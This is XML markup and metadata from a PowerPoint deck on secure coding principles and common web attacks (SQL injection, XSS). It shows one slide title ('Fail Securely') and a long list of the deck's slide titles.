          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="68562" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="90143" marR="6644551">
              <a:lnSpc>
                <a:spcPts val="2699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="540"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Principles </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-35" dirty="0"/>
              <a:t>Fail</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="15" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Securely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-10" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr sz="2499"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916700" y="1332268"/>
            <a:ext cx="9792959" cy="720537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="53961" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="184730" marR="5078" indent="-172668" defTabSz="914126">
              <a:lnSpc>
                <a:spcPts val="2589"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="425"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="185364" algn="l"/>
              </a:tabLst>
            </a:pP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Principle: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Handle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 all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failures securely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return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 system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399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399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399" spc="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proper </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2399" spc="-7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399" spc="-5" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>state</a:t>
            </a:r>
            <a:endParaRPr sz="2399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exagonal design templat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4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al design slides.potx" id="{12658BD0-7259-4A0F-91D4-55B50BBE9BFD}" vid="{57622FE6-AF39-47E3-8976-1D25291C345B}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2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427FAC-CD3A-494C-985C-09E26C5EA507}">
  <ds:schemaRefs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a4f35948-e619-41b3-aa29-22878b09cfd2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40262f94-9f35-4ac3-9a90-690165a166b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11D6E40-F509-498A-BF02-00C895783B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ED73A5-C2D2-4D49-BB89-167E8E32C9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Hexagonal design slides</Template>
  <TotalTime>4307</TotalTime>
  <Words>12958</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>1877</Paragraphs>
  <Slides>199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199</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="213" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Euphemia</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>Hexagonal design template</vt:lpstr>
      <vt:lpstr> Black </vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Web Security Coding</vt:lpstr>
      <vt:lpstr>Breach the Website and the Database</vt:lpstr>
      <vt:lpstr>Security Measures Are in Place</vt:lpstr>
      <vt:lpstr>Test All Applications</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Can the Database Be Hacked?</vt:lpstr>
      <vt:lpstr>What would cause the greatest impact?</vt:lpstr>
      <vt:lpstr>Application Testing</vt:lpstr>
      <vt:lpstr>Exploit the Vulnerabilities</vt:lpstr>
      <vt:lpstr>Weak and Stolen Credentials</vt:lpstr>
      <vt:lpstr>Ransomware</vt:lpstr>
      <vt:lpstr>Ransomware Progression</vt:lpstr>
      <vt:lpstr>Implications</vt:lpstr>
      <vt:lpstr>Protect the Data</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Course Goals</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Understanding Secure Coding Principles</vt:lpstr>
      <vt:lpstr>Understanding Secure Coding Principles</vt:lpstr>
      <vt:lpstr>Understanding Secure Coding Principles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  The Principles</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Application</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Application</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Application</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Establish Trust Boundaries - Application</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles Don't Reinvent The Wheel - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Don't Reinvent The Wheel - Examples</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Don't Reinvent The Wheel - Examples</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Don't Reinvent The Wheel – Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Economy of Mechanism - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Economy of Mechanism - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Economy of Mechanism - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Economy of Mechanism – Example</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Economy of Mechanism – Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Economy of Mechanism – Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Example</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Tips</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Trust Reluctance - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design- Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design- Examples</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design - Example</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design – In Defense of Obscurity</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design – In Defense of Obscurity</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design – Secure Design Pattern</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design - Tips</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Open Design - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Minimize the Attack Surface - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Minimize the Attack Surface - Tips</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Minimize the Attack Surface - Tips</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Minimize the Attack Surface - Tips</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Minimize the Attack Surface - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure the Weakest Link - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure the Weakest Link - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure the Weakest Link - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure the Weakest Link - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure the Weakest Link - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Use Least Privilege- Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Use Least Privilege- Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Use Least Privilege- Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Use Least Privilege – Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Use Default Deny – Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Fail Securely - Introduction</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Fail Securely - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Fail Securely - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure Trust Relationships - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure Trust Relationships - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure Trust Relationships - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure Trust Relationships - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure Trust Relationships - Introduction</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Secure Trust Relationships - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles -</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Psychological Acceptability - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Psychological Acceptability - Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Psychological Acceptability - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles 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Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Validate Inputs - Introduction</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Validate Inputs - Introduction</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Validate Inputs - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Validate Inputs - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Validate Inputs - Tips</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Validate Inputs - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Example</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Tips</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Secure Data at Rest - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Avoid Bypass Attacks - Tips</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Avoid Bypass Attacks - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Audit and Verify - Tips</vt:lpstr>
      <vt:lpstr> Creating Secure Code - Principles</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Defense in Depth - Introduction</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Defense in Depth - Example</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Defense in Depth - Introduction</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Defense in Depth - Introduction</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Secure Coding Principles  Defense in Depth - Tips</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Summary</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Summary</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles</vt:lpstr>
      <vt:lpstr>Common Secure Coding Principles  Summary</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>References  Summary – Books</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SWEBOK KAs covered so far</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>What potential attack happens here?</vt:lpstr>
      <vt:lpstr>What potential attack happens here?</vt:lpstr>
      <vt:lpstr>Example: Unsecured Sign-Up Page</vt:lpstr>
      <vt:lpstr>How to prevent?</vt:lpstr>
      <vt:lpstr>How to prevent?</vt:lpstr>
      <vt:lpstr>How to enable site-wide SSL in Rails</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>Why were the student records lost?</vt:lpstr>
      <vt:lpstr>Why were the student records lost?</vt:lpstr>
      <vt:lpstr>Imagine controller that looks up students by name</vt:lpstr>
      <vt:lpstr>Imagine controller that looks up students by name</vt:lpstr>
      <vt:lpstr>What if…?</vt:lpstr>
      <vt:lpstr>What if…?</vt:lpstr>
      <vt:lpstr>How to prevent SQL injection? </vt:lpstr>
      <vt:lpstr>How to prevent SQL injection? </vt:lpstr>
      <vt:lpstr>Translation becomes…</vt:lpstr>
      <vt:lpstr>Translation becomes…</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>Micropost Example: What if…?</vt:lpstr>
      <vt:lpstr>Micropost Example: What if…?</vt:lpstr>
      <vt:lpstr>Malicious script runs when feed loads!</vt:lpstr>
      <vt:lpstr>How to prevent cross-site scripting (XSS)?</vt:lpstr>
      <vt:lpstr>How to prevent cross-site scripting (XSS)?</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>CERT Top 10 Software Security Practices</vt:lpstr>
      <vt:lpstr>For more attacks and countermeasures, see the Rails Security Guide  http://guides.rubyonrails.org/security.html</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Moorche 30 DVDs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Ethical Hacking: Penetration Testing</dc:title>
  <dc:creator>MRT www.Win2Farsi.com</dc:creator>
  <cp:lastModifiedBy>Sheikh Nasir Kamarudin</cp:lastModifiedBy>
  <cp:revision>71</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-13T02:36:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-22T00:30:12Z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74063900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